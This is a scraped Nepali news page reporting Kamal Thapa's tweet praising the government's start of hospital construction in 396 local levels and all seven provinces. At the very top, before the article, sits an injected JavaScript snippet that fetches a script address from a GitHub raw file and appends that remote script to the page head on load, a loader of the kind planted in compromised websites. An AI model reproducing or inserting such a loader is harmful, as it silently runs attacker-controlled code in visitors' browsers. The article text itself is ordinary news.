;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ३९६ वटै स्थानीय तहमा अस्पताल निर्माण गर्ने सरकारको काम प्रशंसनिय छ-कमल थापा – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ३९६ वटै स्थानीय तहमा अस्पताल निर्माण गर्ने सरकारको काम प्रशंसनिय छ-कमल थापा
पत्रपत्रिका

३९६ वटै स्थानीय तहमा अस्पताल निर्माण गर्ने सरकारको काम प्रशंसनिय छ-कमल थापा

मंसिर १५,

काठमाडौं । सरकारले देशैभरीका ३९६ स्थानीय तहमा आधारभूत अस्पताल र ७ वटै प्रदेशमा सरुवा रोग अस्पताल भवन निर्माणको थलानी  हुनु प्रशंसनिय भएको राष्ट्रिय प्रजान्त्र पार्टी (राप्रपा) का अध्यक्ष कमल थापाले बताएका छन् । सरकारले सोमबार देशैभरीका ३९६ वटा गाउँपालिकामा स्वास्थ्य सेवा विस्तार गर्ने उदेश्यका साथ एकै साथ अस्पताल शिलन्या गरेको छ । सोही काम राम्रो भएको उनले टुवीट् गर्दै उल्लेख गरेका हुन् ।

उनले टुवीट्मा लेखेका छन्- हस्पिटल निर्माण गर्ने सरकारको निर्णय र बजेट विनियोजन प्रंशसनिय छ। समय मै निर्माण कार्य सम्पन्न होस् तथा हस्पिटल संचालनको निम्ति तालिम प्राप्त जनशक्ति र अन्य आवश्यक व्यवस्था गर्ने तर्फ समेत ध्यान जाओस् ।

उनले अस्पताल बनाएर दक्षजनशक्ति मार्फत ती अस्पतालबाट सेवा प्रवाह हुनु पर्नेमा जोड्दिएका छन् ।

फेसबुक प्रतिक्रियाहरु